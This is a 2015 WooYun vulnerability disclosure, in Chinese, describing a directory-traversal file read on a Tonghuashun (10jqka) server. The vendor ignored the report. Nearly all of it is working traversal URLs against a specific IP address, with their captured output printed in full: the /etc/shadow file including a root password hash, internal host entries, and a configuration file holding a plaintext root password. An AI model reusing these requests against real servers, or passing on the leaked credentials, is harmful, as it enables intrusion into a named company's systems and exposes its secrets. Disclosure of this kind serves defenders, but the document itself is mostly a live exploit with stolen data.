当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111287

漏洞标题:同花顺某台服务器任意文件读取

相关厂商:同花顺

漏洞作者: 路人甲

提交时间:2015-04-30 16:22

修复时间:2015-05-05 16:24

公开时间:2015-05-05 16:24

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-30: 细节已通知厂商并且等待厂商处理中
2015-05-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

需要使用一些发请求的工具,不会忽略../的
http://125.93.53.228/../../../../../../../../../../../../../../../../../etc/hosts

# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 hz-zx-linux localhost.localdomain localhost
60.12.139.226 deliver.10jqka.com.cn
::1 localhost6.localdomain6 localhost6


http://125.93.53.228/../../../../../../../../../../../../../../../../../etc/shadow

root:$1$AGk4QNv/$5Z.UHNtJ4H.7ID9kZNN.Z.:15844:0:99999:7:::
bin:*:15219:0:99999:7:::
daemon:*:15219:0:99999:7:::
adm:*:15219:0:99999:7:::
lp:*:15219:0:99999:7:::
sync:*:15219:0:99999:7:::
shutdown:*:15219:0:99999:7:::
halt:*:15219:0:99999:7:::
mail:*:15219:0:99999:7:::
news:*:15219:0:99999:7:::
uucp:*:15219:0:99999:7:::
operator:*:15219:0:99999:7:::
games:*:15219:0:99999:7:::
gopher:*:15219:0:99999:7:::
ftp:*:15219:0:99999:7:::
nobody:*:15219:0:99999:7:::
nscd:!!:15219:0:99999:7:::
vcsa:!!:15219:0:99999:7:::
rpc:!!:15219:0:99999:7:::
mailnull:!!:15219:0:99999:7:::
smmsp:!!:15219:0:99999:7:::
oprofile:!!:15219:0:99999:7:::
pcap:!!:15219:0:99999:7:::
dbus:!!:15219:0:99999:7:::
avahi:!!:15219:0:99999:7:::
pegasus:!!:15219:0:99999:7:::
sshd:!!:15219:0:99999:7:::
rpcuser:!!:15219:0:99999:7:::
nfsnobody:!!:15219:0:99999:7:::
haldaemon:!!:15219:0:99999:7:::
avahi-autoipd:!!:15219:0:99999:7:::
xfs:!!:15219:0:99999:7:::
www:!!:15821:0:99999:7:::
ntp:!!:15929::::::


http://125.93.53.228/../../../../../../../../../../../../../../../../..//usr/local/hexin/data/text/infodata/upload/7965.html

<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>
好当家董事会决议:通过完善公司债券担保方式的议案。定于3月8日召开2013年第一次临时股东大会。


http://125.93.53.228/../../../../../../../../../../../../../../../../../usr/local/hexin/conf/syncd2.ini

############################################################################################
# Ѷͬ ļ
[sync]
# Դ ַ
syncurl=http://deliver.10jqka.com.cn/deliver/packages/
Version=2.0.1.96503
LastPack=20150426160303.32.lgt.zip
Restart_Site=20150425165020.3.rss.zip
Restart_Times=0


http://125.93.53.228/../../../../../../../../../../../../../../../../../usr/local/hexin/syncfile/system.xml

<?xml version="1.0" encoding="gbk"?><System><Port>8618</Port>
<Protocol>TCP</Protocol>
<Option>6</Option>
<ServerThreads>5</ServerThreads>
<ClientThreads>5</ClientThreads>
<User Name="root" Pwd="111111" Option="48"/>
</System>

漏洞证明:

见详细

修复方案:

李劼杰的博客
http://www.lijiejie.com/python-django-directory-traversal/

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-05 16:24

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无